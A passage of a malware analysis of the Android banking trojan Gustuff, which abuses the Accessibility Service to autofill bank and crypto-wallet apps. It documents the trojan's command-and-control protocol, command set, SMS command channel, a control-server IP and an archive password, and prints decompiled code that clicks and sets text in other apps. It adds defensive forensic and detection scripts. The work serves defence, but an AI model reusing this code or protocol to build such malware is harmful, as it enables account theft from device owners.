How the Android Trojan Gustuff skims the cream (fiat and crypto) off your accounts


The other day Group-IB reported on the activity of the mobile Android Trojan Gustuff. It operates exclusively in international markets, attacking customers of the 100 largest foreign banks, users of 32 mobile crypto wallets, and major e-commerce resources. The developer of Gustuff, however, is a Russian-speaking cybercriminal under the nickname Bestoffer. Until recently he advertised his Trojan as "a serious product for people with knowledge and experience."

Ivan Pisarev, malicious code analysis specialist at Group-IB, describes in detail in his research how Gustuff works and what danger it poses.

Who does Gustuff hunt?

Gustuff belongs to a new generation of malware with fully automated functionality. According to the developer, the Trojan is a new and improved version of the AndyBot malware, which since November 2017 has been attacking Android phones and stealing money through phishing web forms masquerading as the mobile applications of well-known international banks and payment systems. Bestoffer stated that the rental price of the Gustuff bot is $800 per month.

Analysis of the Gustuff sample showed that the Trojan can potentially target customers using the mobile applications of the largest banks, such as Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank and PNC Bank, as well as the crypto wallets Bitcoin Wallet, BitPay, Cryptopay, Coinbase and others.

Originally created as a classic banking Trojan, in its current version Gustuff has significantly expanded its list of targets. In addition to the Android applications of banks, fintech companies and crypto services, Gustuff targets users of marketplace applications, online stores, payment systems and instant messengers, in particular PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut and others.

Point of entry: built for mass infection

Gustuff uses the "classic" vector of penetration into Android smartphones: SMS mailings with links to APKs. Once an Android device is infected with the Trojan, at the server's command Gustuff can spread further through the contact list of the infected phone or through the server's database. Gustuff's functionality is designed for mass infection and maximum monetisation of its operators' business: it has a unique "autofill" function for legitimate mobile banking applications and crypto wallets, which allows the theft of money to be accelerated and scaled.

A study of the Trojan showed that its autofill function is implemented using the Accessibility Service, a service intended for people with disabilities. Gustuff is not the first Trojan to successfully bypass protection against interaction with the windows of other applications by means of this Android service. However, the use of the Accessibility Service in combination with an autofill engine is still quite rare.

After being downloaded onto the victim's phone, Gustuff is able, through the Accessibility Service, to interact with the windows of other applications (banking, cryptocurrency, online shopping, messaging and others), performing the actions the attackers need. For example, at the server's command the Trojan can press buttons and change the values of text fields in a banking application. Using the Accessibility Service mechanism lets the Trojan bypass the security mechanisms that banks use against the previous generation of mobile Trojans, as well as the security policy changes Google introduced in new versions of Android. Gustuff also "knows how" to disable Google Protect: according to the author, this function works in 70% of cases.


Gustuff can also display fake PUSH notifications bearing the icons of legitimate mobile applications. The user taps the PUSH notification and sees a phishing window downloaded from the server, where they enter the requested bank card or crypto wallet data. In another Gustuff scenario, the application on whose behalf the PUSH notification was shown is opened. In this case the malware, on a command from the server and via the Accessibility Service, can fill in the fields of the banking application's form to perform a fraudulent transaction.

Gustuff's functionality also includes sending information about the infected device to the server, reading and sending SMS, sending USSD requests, launching a SOCKS5 proxy, following links, sending files (including photographed scans of documents, screenshots and photos) to the server, and resetting the device to factory settings.

Malware Analysis

Before the malicious application is installed, Android shows the user a window listing the permissions requested by Gustuff:

(screenshot of the permission request dialog omitted)
The application is installed only after the user's consent. After launch, the Trojan shows the user a window:

(screenshot omitted)
After which it removes its icon.

Gustuff is packed, according to the author, with a packer from FTT. After launch, the application periodically contacts the CnC server to receive commands. Several of the files we analysed used the IP address 88.99.171[.]105 as the control server (hereinafter referred to as <%CnC%>).

After launch, the program starts sending requests to the server at http://<%CnC%>/api/v1/get.php.

The response is expected to be JSON in the following format:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

Each time the application contacts the server, it sends information about the infected device. The message format is shown below. Note that the fields full, extra, apps and permission are optional and are sent only when the CnC requests them with a command.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
} 

Storing configuration data

Gustuff stores important working data in a preferences file. The file name, as well as the names of the parameters in it, is the MD5 hash of the string 15413090667214.6.1<%name%>, where <%name%> is the original name of the value. A Python rendering of the name generation function:

 import hashlib
 def nameGenerator(input):
     # MD5 hex digest of the fixed prefix followed by the original name
     return hashlib.md5(("15413090667214.6.1" + input).encode()).hexdigest()

Hereinafter we will denote it as nameGenerator(input).
So the preferences file name is nameGenerator("API_SERVER_LIST"), and it contains values with the following names:

Variable name - Value
nameGenerator("API_SERVER_LIST") - Contains the list of CnC addresses as an array.
nameGenerator("API_SERVER_URL") - Contains the CnC address.
nameGenerator("SMS_UPLOAD") - Flag set by default. If the flag is set, SMS messages are sent to the CnC.
nameGenerator("SMS_ROOT_NUMBER") - Phone number to which SMS received by the infected device are forwarded. Default is null.
nameGenerator("SMS_ROOT_NUMBER_RESEND") - Flag cleared by default. If set, an SMS received by the infected device is forwarded to the root number.
nameGenerator("DEFAULT_APP_SMS") - Flag cleared by default. If set, the application processes incoming SMS messages.
nameGenerator("DEFAULT_ADMIN") - Flag cleared by default. If set, the application has administrator rights.
nameGenerator("DEFAULT_ACCESSIBILITY") - Flag cleared by default. If set, a service using the Accessibility Service is running.
nameGenerator("APPS_CONFIG") - A JSON object containing the list of actions to perform when an Accessibility event associated with a particular application fires.
nameGenerator("APPS_INSTALLED") - Stores the list of applications installed on the device.
nameGenerator("IS_FIST_RUN") - Flag reset on first launch.
nameGenerator("UNIQUE_ID") - Contains a unique identifier. Generated when the bot is launched for the first time.
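The key derivation described above is what an examiner needs in order to locate and read the Trojan's preferences file on a forensic image: both the file name and every key inside it are MD5 hashes, so they must be recomputed and matched. The following is an added example (our own code, not Group-IB's or the sample's) that builds the hash-to-name lookup from the table above, names the file to look for under shared_prefs/, and renames the hashed keys in a SharedPreferences XML dump. The XML layout is the standard Android SharedPreferences format; the dump itself is constructed, and the CnC URL in it is a placeholder.

```python
import hashlib
import xml.etree.ElementTree as ET

# Prefix and key names as documented for this sample: the preferences file
# name and every key inside it are MD5(prefix + name).
PREFIX = "15413090667214.6.1"
KNOWN_NAMES = [
    "API_SERVER_LIST", "API_SERVER_URL", "SMS_UPLOAD", "SMS_ROOT_NUMBER",
    "SMS_ROOT_NUMBER_RESEND", "DEFAULT_APP_SMS", "DEFAULT_ADMIN",
    "DEFAULT_ACCESSIBILITY", "APPS_CONFIG", "APPS_INSTALLED",
    "IS_FIST_RUN", "UNIQUE_ID",
]


def name_generator(name: str) -> str:
    """MD5 hex digest of prefix + name, as the sample derives its key names."""
    return hashlib.md5((PREFIX + name).encode("utf-8")).hexdigest()


def build_lookup(names=KNOWN_NAMES) -> dict:
    """Map each hashed key back to its clear-text name."""
    return {name_generator(n): n for n in names}


def preferences_file_name() -> str:
    """The XML file an examiner should look for under shared_prefs/."""
    return name_generator("API_SERVER_LIST") + ".xml"


def decode_preferences(xml_text: str, lookup=None) -> dict:
    """Parse a SharedPreferences XML dump and replace hashed keys by names.

    Keys that are not in the lookup are kept, prefixed with UNKNOWN:, so
    nothing in the dump is silently dropped.
    """
    lookup = lookup or build_lookup()
    result = {}
    for elem in ET.fromstring(xml_text.encode("utf-8")):
        hashed = elem.get("name")
        clear = lookup.get(hashed, "UNKNOWN:" + str(hashed))
        # <string> keeps its value as element text; <boolean>/<int>/<long>
        # carry it in the value attribute.
        value = elem.text if elem.tag == "string" else elem.get("value")
        result[clear] = value
    return result


# Constructed sample dump (not from a real device): two known keys plus one
# unrelated key; the server URL is a placeholder.
SAMPLE_XML = (
    "<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n"
    f"  <string name=\"{name_generator('API_SERVER_URL')}\">"
    "http://CNC_PLACEHOLDER/api/v1/get.php</string>\n"
    f"  <boolean name=\"{name_generator('SMS_UPLOAD')}\" value=\"true\" />\n"
    "  <string name=\"deadbeef\">noise</string>\n"
    "</map>\n"
)

if __name__ == "__main__":
    print("preferences file:", preferences_file_name())
    for key, value in decode_preferences(SAMPLE_XML).items():
        print(f"{key} = {value}")
```

Because the prefix is fixed in the sample, the same lookup table applies to every infected device; if a later build changes the prefix, only PREFIX needs updating and the rest of the tooling still works.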

Module for processing commands from the server

The application stores the addresses of the CnC servers as a Base85-encoded array. The list of CnC servers can be changed on receipt of the corresponding command, in which case the addresses are stored in the preferences file.

In response to the request, the server sends a command to the application. Note that commands and parameters are presented in JSON format. The application can process the following commands:

Command - Description
forwardStart - Start forwarding SMS messages received by the infected device to the CnC server.
forwardStop - Stop forwarding SMS messages received by the infected device to the CnC server.
ussdRun - Execute a USSD request. The number to which the USSD request must be made is in the JSON field "number".
sendSms - Send one SMS message (if necessary, the message is "split" into parts). As a parameter the command takes a JSON object containing the fields "to" (the recipient number) and "body" (the message body).
sendSmsAb - Send SMS messages (split into parts if necessary) to everyone in the contact list of the infected device. The interval between sends is 10 seconds. The message body is in the JSON field "body".
sendSmsMass - Send SMS messages (split into parts if necessary) to the recipients specified in the command parameters. The interval between sends is 10 seconds. As a parameter the command takes a JSON array (the "sms" field) whose elements contain the fields "to" (the recipient number) and "body" (the message body).
changeServer - This command can take as a parameter a value with the key "url", in which case the bot changes the value of nameGenerator("SERVER_URL"), or "array", in which case the bot writes the array to nameGenerator("API_SERVER_LIST"). In this way the application changes the address of the CnC servers.
adminNumber - The command is intended for working with the root number. It accepts a JSON object with the following parameters: "number" changes nameGenerator("ROOT_NUMBER") to the received value, "resend" changes nameGenerator("SMS_ROOT_NUMBER_RESEND"), "sendId" sends the unique ID to nameGenerator("ROOT_NUMBER").
updateInfo - Send information about the infected device to the server.
wipeData - The command is intended to delete user data. Depending on the name under which the application was launched, either the data is wiped completely with a device reset (primary user) or only the user data is deleted (secondary user).
socksStart - Launch the Proxy module. The module's operation is described in a separate section.
socksStop - Stop the Proxy module.
openLink - Follow a link. The link is in the JSON parameter under the "url" key. "android.intent.action.VIEW" is used to open the link.
uploadAllSms - Send all SMS messages received by the device to the server.
uploadAllPhotos - Send images from the infected device to a URL. The URL comes as a parameter.
uploadFile - Send a file from the infected device to a URL. The URL comes as a parameter.
uploadPhoneNumbers - Send phone numbers from the contact list to the server. If a JSON object with the key "ab" is received as a parameter, the application takes the contact list from the phone book. If a JSON object with the key "sms" is received, the application reads the contact list from the senders of SMS messages.
updateArchive - The application downloads a file from the address that arrives as a parameter under the "url" key. The downloaded file is saved under the name "archive.zip". The application then unzips the file, optionally using the archive password "b5jXh37gxgHBrZhQ4j3D". The unzipped files are saved in the [external storage]/hgps directory. In this directory the application stores the web fakes (more on these below).
action - The command is intended for working with the Action Service, which is described in a separate section.
test - Does nothing.
download - The command is intended to download a file from the remote server and save it in the "Downloads" directory. The URL and file name come as parameters, as the fields "url" and "fileName" of the JSON parameter object.
remove - Delete a file from the "Downloads" directory. The file name comes in the JSON parameter under the "fileName" key. The default file name is "tmp.apk".
notification - Show a notification with the description and title texts specified by the control server.

Notification command format:

{
    "results" : "OK",
    "command":{
        "id": <%id%>,
        "command":"notification",
        "timestamp":<%Server Timestamp%>,
        "params":{
            "openApp":<%Open original app or not%>,
            "array":[
                {"title":<%Title text%>,
                 "desc":<%Description text%>,
                 "app":<%Application name%>}
            ]
        },
    },
}

The notification generated by the application under study looks identical to a notification generated by the application named in the app field. If the value of the openApp field is True, opening the notification launches the application named in the app field. If the value of the openApp field is False, then:

  • A phishing window opens whose contents are loaded from the directory <%external storage%>/hgps/<%filename%>
  • A phishing window opens whose contents are loaded from the server <%url%>?id=<%Bot id%>&app=<%Application name%>
  • A phishing window opens that imitates a Google Play card form, with a prompt to enter card details.

The application sends the result of executing a command to <%CnC%>set_state.php as a JSON object in the following format:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    },
    "id":<%bot_id%>
}
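For an analyst looking at intercepted traffic between an infected device and the CnC, the two JSON shapes above (the get.php command response and the set_state.php result report) are the structures to decode and prioritise. The following is an added example (our own code, not Group-IB's or the sample's) that parses both, tolerating the trailing commas present in the documented response format, and assigns each command an impact label drawn from the command table earlier in this section. The impact grouping is our own triage convention, and the sample response and report are constructed, with placeholder identifiers.

```python
import json
import re

# Impact grouping of the documented command set; the grouping is our own
# triage convention, not part of the original analysis.
DESTRUCTIVE = {"wipeData"}
PAYLOAD_DELIVERY = {"updateArchive", "download", "changeServer", "socksStart"}
FRAUD_UI = {"action", "notification", "openLink"}
DATA_THEFT = {"uploadAllSms", "uploadAllPhotos", "uploadFile",
              "uploadPhoneNumbers", "forwardStart", "updateInfo",
              "sendSms", "sendSmsAb", "sendSmsMass"}


def parse_command(response_text: str) -> dict:
    """Decode a get.php response into id/command/timestamp/params.

    The documented response carries trailing commas before closing braces,
    which json.loads rejects, so they are stripped first.
    """
    cleaned = re.sub(r",(\s*[}\]])", r"\1", response_text)
    doc = json.loads(cleaned)
    if doc.get("results") != "OK" or not isinstance(doc.get("command"), dict):
        raise ValueError("not a Gustuff command response")
    cmd = doc["command"]
    return {
        "id": cmd.get("id"),
        "command": cmd.get("command"),
        "timestamp": cmd.get("timestamp"),
        "params": cmd.get("params") or {},
    }


def triage(cmd: dict) -> str:
    """Assign an impact label to a decoded command for alert prioritisation."""
    name = cmd.get("command")
    if name in DESTRUCTIVE:
        return "destructive"
    if name in PAYLOAD_DELIVERY:
        return "payload-delivery"
    if name in FRAUD_UI:
        return "fraud-ui"
    if name in DATA_THEFT:
        return "data-theft"
    return "other"


def impersonated_apps(cmd: dict) -> list:
    """For a notification command, list the package names being imitated."""
    if cmd.get("command") != "notification":
        return []
    return [item.get("app") for item in cmd["params"].get("array", [])]


def parse_result(report_text: str) -> tuple:
    """Decode a set_state.php report into (bot_id, command_id, state)."""
    doc = json.loads(report_text)
    inner = doc["command"]
    return doc["id"], inner["id"], inner["state"]


# Constructed sample traffic (not a real capture); all values are placeholders.
SAMPLE_RESPONSE = """{
    "results" : "OK",
    "command":{
        "id": "42",
        "command":"notification",
        "timestamp":"1541309066",
        "params":{
            "openApp": false,
            "array":[
                {"title":"Confirm your account","desc":"Tap to review","app":"com.example.bank"}
            ]
        },
    },
}"""
SAMPLE_REPORT = ('{"command":{"command":"notification","id":"42","state":"ok"},'
                 '"id":"BOT_ID_PLACEHOLDER"}')

if __name__ == "__main__":
    cmd = parse_command(SAMPLE_RESPONSE)
    print(cmd["command"], triage(cmd), impersonated_apps(cmd))
    print(parse_result(SAMPLE_REPORT))
```

The package names returned by impersonated_apps are the most actionable part of a notification command for a defender: they tell you which legitimate application the fake notification copies, and therefore which customers' accounts need to be watched.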

Action Service
The list of commands that the application processes includes action. When this command is received, the command processing module calls this service to execute the extended command. The service accepts a JSON object as a parameter. The service can execute the following commands:

1. PARAMS_ACTION - on receiving this command, the service first reads from the JSON parameter the value of the Type key, which can be one of the following:

  • service - the command reads from the JSON parameter the value of the includeNotImportant key. If the flag is true, the application sets the FLAG_ISOLATED_PROCESS flag on the service that uses the Accessibility Service. In this way the service is placed in a separate process.
  • root - obtains and sends to the server information about the window currently in focus. The application obtains the data using the AccessibilityNodeInfo class.
  • admin - requests administrator rights.
  • delay - suspends the Action Service for the number of milliseconds specified in the parameter under the "data" key.
  • windows - sends the list of windows visible to the user.
  • install - installs an application on the infected device. The name of the archive package is in the "fileName" key. The archive itself is in the Downloads directory.
  • global - the subcommand is intended for navigating away from the current window:
    • to the Quick Settings menu
    • back
    • home
    • to the notifications
    • to the recently opened applications window

  • launch - launches an application. The application name comes as a parameter under the data key.
  • sound - switches the sound mode to silent.
  • unlock - turns on the backlight of the screen and keyboard at full brightness. The application performs this command using a WakeLock, specifying the string [Application label]:INFO as the tag.
  • permissionOverlay - the function is not implemented (the response to execution is {"message":"not supported"} or {"message":"low sdk"}).
  • gesture - the function is not implemented (the response to execution is {"message":"not supported"} or {"message":"Low API"}).
  • permissions - this command is intended to request permissions for the application. However, the request function is not implemented, so the command has no effect. The list of requested permissions comes as a JSON array under the "permissions" key. Standard list:
    • android.permission.READ_PHONE_STATE
    • android.permission.READ_CONTACTS
    • android.permission.CALL_PHONE
    • android.permission.RECEIVE_SMS
    • android.permission.SEND_SMS
    • android.permission.READ_SMS
    • android.permission.READ_EXTERNAL_STORAGE
    • android.permission.WRITE_EXTERNAL_STORAGE

  • open - show a phishing window. Depending on the parameter received from the server, the application can show the following phishing windows:
    • A phishing window whose contents are stored in a file in the directory <%external directory%>/hgps/<%param_filename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
    • A phishing window whose contents are preloaded from the address <%url_param%>?id=<%bot_id%>&app=<%packagename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
    • A phishing window that imitates a Google Play card form.

  • interactive - the command is intended for interacting with the window elements of other applications through the AccessibilityService. A dedicated service is implemented in the program for this interaction. The application under study can interact with windows that are:
    • Currently active. In this case the parameter contains the id or the text (name) of the element to interact with.
    • Visible to the user at the moment the command is executed. The application selects such windows by id.

    Having obtained the AccessibilityNodeInfo objects for the elements of interest, the application, depending on the parameters, can perform the following actions:

    • focus - set focus on the element.
    • click - click the element.
    • actionId - perform the action with the given ID.
    • setText - change the text of the element. The text is changed in one of two ways: by performing the ACTION_SET_TEXT action (if the Android version of the infected device is LOLLIPOP or newer), or by placing the string on the clipboard and pasting it into the element (for older versions). This command can be used to change data in a banking application.

2. PARAMS_ACTIONS - the same as PARAMS_ACTION, except that a JSON array of commands arrives.

Many will probably be interested in how the function for interacting with the windows of other applications works. This is how that functionality is implemented in Gustuff:

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    // How many times each action is repeated on every node (the decompiled
    // listing reused the name "count" for this and for the counter below)
    int repeat = action.optInt("repeat", 1);
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;  // number of actions that were performed successfully
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= repeat) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    // 1 == AccessibilityNodeInfo.ACTION_FOCUS
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    // 16 == AccessibilityNodeInfo.ACTION_CLICK
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    // arbitrary accessibility action chosen by the server
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    customHeader ch = CustomAccessibilityService.a;
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == repeat) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    // the number of successful actions is reported back to the server
    res.addPropertyNumber("res", Integer.valueOf(count));
    return count > 0;  // return statement not visible in the decompiled listing; assumed here
}

Text replacement function:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build.VERSION.SDK_INT >= 21) {  // Android 5.0 (Lollipop) and newer
        // set the field text directly through the accessibility API
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        // older versions: put the text on the clipboard and paste it into the field
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
            ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
            result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

Thus, with the right configuration on the control server, Gustuff is able to fill in text fields in a banking application and press the buttons needed to complete a transaction. The Trojan does not even need to log into the application: it is enough to send a command to display a PUSH notification and then open the previously installed banking application. The user authenticates themselves, after which Gustuff can perform the autofill.

SMS message processing module

The application installs an event handler for SMS messages received by the infected device. The application under study can receive commands from the operator that arrive in the body of an SMS message. Commands come in the format:

7!5=<%Base64 encoded command%>

The application searches each incoming SMS message for the string 7!5=; when the string is found, it decodes the string from Base64 starting at offset 4 and executes the command. The commands are the same as those received from the CnC. The execution result is sent to the number from which the command came. Response format:

7*5=<%Base64 encoding of "result_code command"%>
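The SMS command channel above is a useful detection point: the marker 7!5= (and the 7*5= reply marker) followed by Base64 is distinctive enough to flag in SMS logs exported from a device or in an MDM feed. The following is an added example (our own code, not Group-IB's or the sample's) that scans a list of (sender, body) pairs for both markers, decodes the payload from the documented offset, and reports findings, treating a marker with an invalid Base64 payload as a non-match rather than an error. The message list is constructed; the sender numbers are placeholders.

```python
import base64
import binascii

CMD_MARKER = "7!5="   # operator command to the bot
RESP_MARKER = "7*5="  # bot reply: "<result_code> <command>"


def _decode_after(body: str, marker: str):
    """Return the Base64-decoded text following marker, or None if absent/invalid."""
    idx = body.find(marker)
    if idx < 0:
        return None
    payload = body[idx + len(marker):].strip()
    try:
        return base64.b64decode(payload, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_sms_command(body: str):
    """Decoded command carried by a 7!5= message, or None."""
    return _decode_after(body, CMD_MARKER)


def find_sms_response(body: str):
    """(result_code, command) carried by a 7*5= reply, or None."""
    decoded = _decode_after(body, RESP_MARKER)
    if decoded is None:
        return None
    code, _, command = decoded.partition(" ")
    return code, command


def scan_messages(messages):
    """Run over (sender, body) pairs and return the findings worth alerting on."""
    findings = []
    for sender, body in messages:
        cmd = find_sms_command(body)
        if cmd is not None:
            findings.append({"sender": sender, "kind": "command", "value": cmd})
            continue
        resp = find_sms_response(body)
        if resp is not None:
            findings.append({"sender": sender, "kind": "response", "value": resp})
    return findings


# Constructed sample messages (not real traffic). "dGVzdA==" is Base64 for
# "test", the documented no-op command; "MCB0ZXN0" is Base64 for "0 test".
SAMPLE_MESSAGES = [
    ("+15550100", "Your parcel is delayed, see https://example.invalid"),
    ("+15550101", "7!5=dGVzdA=="),
    ("+15550102", "7*5=MCB0ZXN0"),
    ("+15550103", "7!5=not base64!"),
]

if __name__ == "__main__":
    for finding in scan_messages(SAMPLE_MESSAGES):
        print(finding)
```

In production the scan would be fed from the device's SMS provider export or an MDM telemetry stream; the decoded command name can then be mapped to the command table earlier in this section to judge severity.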

Optionally, the application can forward all received messages to the root number. For this, the root number must be specified in the preferences file and the message forwarding flag must be set. The SMS is sent to the attacker's number in the format:

<%From number%> - <%Time, format: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

Also optionally, the application can send messages to the CnC. SMS messages are sent to the server in JSON format:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

If the nameGenerator("DEFAULT_APP_SMS") flag is set, the application stops processing the SMS message and clears the list of incoming messages.

Proxy module

The application under study contains a Backconnect Proxy module (hereinafter the Proxy module), implemented as a separate class that includes static fields with the configuration. The configuration data is stored in the sample in clear form:

(screenshot of the configuration class omitted)

Every action performed by the Proxy module is logged to a file. For this the application creates a directory named "logs" in external storage (the ProxyConfigClass.logsDir field of the configuration class) in which the log files are stored. Logging goes to files with the following names:

  1. main.txt - the work of the class named CommandServer is logged to this file. Hereinafter, logging the string str to this file is denoted mainLog(str).
  2. session-<%id%>.txt - this file stores the log data associated with a particular session of the Proxy module. Hereinafter, logging the string str to this file is denoted sessionLog(str).
  3. server.txt - this file is used to record all data written to the files described above.

Log data format:

<%Date%> [Thread[<%thread id%>], id[]]: log-string

Exceptions that occur while the Proxy module is running are also logged to a file. For this the application builds a JSON object in the following format:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

It then converts the object to its string representation and logs it.
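The "logs" directory described above is a convenient artefact for an examiner, since the malware records its own proxy activity, including the CnC host and ports it was configured with and any exceptions it hit. The following is an added example (our own code, not Group-IB's or the sample's) that parses main.txt / session-<%id%>.txt lines in the documented "<%Date%> [Thread[<%thread id%>], id[]]: log-string" layout, recognises the Server::start() line, and condenses the serialized uncaughtException JSON into a one-line summary. The analysis does not specify the date format, so the parser takes everything before " [Thread[" as the timestamp; the log text itself is constructed, and the host and ports in it are placeholders.

```python
import json
import re

# Documented line layout; the date format is not specified, so the date is
# simply everything before " [Thread[".
LINE_RE = re.compile(
    r"^(?P<date>.+?) \[Thread\[(?P<thread>[^\]]*)\], id\[(?P<session>[^\]]*)\]\]: (?P<msg>.*)$"
)
# The mainLog line written when the command server starts.
START_RE = re.compile(
    r"Server::start\(\) host\[(?P<host>[^\]]*)\], commandPort\[(?P<cport>\d+)\], proxyPort\[(?P<pport>\d+)\]"
)


def parse_log_line(line: str):
    """Split one log line into its fields, or return None if it does not match."""
    m = LINE_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def summarize_exception(msg: str):
    """If the log-string is the serialized uncaughtException JSON, condense it."""
    if not msg.startswith("{"):
        return None
    try:
        doc = json.loads(msg)
    except json.JSONDecodeError:
        return None
    if "uncaughtException" not in doc:
        return None
    frames = doc.get("trace") or []
    where = "?"
    if frames:
        f = frames[0]  # innermost frame is the most useful for triage
        where = (f"{f.get('ClassName')}.{f.get('MethodName')}"
                 f"({f.get('FileName')}:{f.get('LineNumber')})")
    return f"{doc['uncaughtException']}: {doc.get('message')} at {where}"


def extract_proxy_endpoints(entries):
    """Collect (host, command_port, proxy_port) from Server::start() lines."""
    found = []
    for e in entries:
        m = START_RE.search(e["msg"])
        if m:
            found.append((m["host"], int(m["cport"]), int(m["pport"])))
    return found


def parse_log(text: str):
    """Parse a whole log file; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        e = parse_log_line(line)
        if e is None:
            continue
        e["exception"] = summarize_exception(e["msg"])
        entries.append(e)
    return entries


# Constructed sample log (not from a real device); host and ports are placeholders.
SAMPLE_LOG = """\
2019-03-20 10:15:01 [Thread[12], id[]]: start server
2019-03-20 10:15:01 [Thread[12], id[]]: Server::start() host[PROXY_CNC_PLACEHOLDER], commandPort[4444], proxyPort[5555]
2019-03-20 10:15:07 [Thread[13], id[7]]: {"uncaughtException": "java.net.SocketException", "thread": "Thread-13", "message": "Connection reset", "trace": [{"ClassName": "a.b.CommandConnection", "FileName": "CommandConnection.java", "LineNumber": 88, "MethodName": "run"}]}
not a log line
"""

if __name__ == "__main__":
    parsed = parse_log(SAMPLE_LOG)
    print("proxy endpoints:", extract_proxy_endpoints(parsed))
    for entry in parsed:
        print(entry["date"], entry["thread"], entry["exception"] or entry["msg"])
```

The host and port tuples recovered by extract_proxy_endpoints are the indicators worth carrying into network monitoring, since the proxy backconnect goes to that address rather than to the HTTP CnC used for commands.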

The Proxy module is launched on receipt of the corresponding command. When a command to launch the Proxy module is received, the application starts a service named MainService, which is responsible for managing the Proxy module, that is, starting and stopping it.

Stages of service initialisation:

1. Start a timer that fires once a minute and checks whether the Proxy module is active. If the module is not active, it is started.
The Proxy module is also started when the android.net.conn.CONNECTIVITY_CHANGE event occurs.

2. The application creates a wake-lock with the PARTIAL_WAKE_LOCK parameter and acquires it. This prevents the device's CPU from entering sleep mode.

3. Launch the command processing class of the Proxy module, first logging the line mainLog("start server") and

Server::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]

where proxy_cnc, command_port and proxy_port are parameters obtained from the Proxy server configuration.

The command processing class is called CommandConnection. Immediately after launch it performs the following actions:

4. Connects to ProxyConfigClass.host:ProxyConfigClass.commandPort and sends information about the infected device in JSON format:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
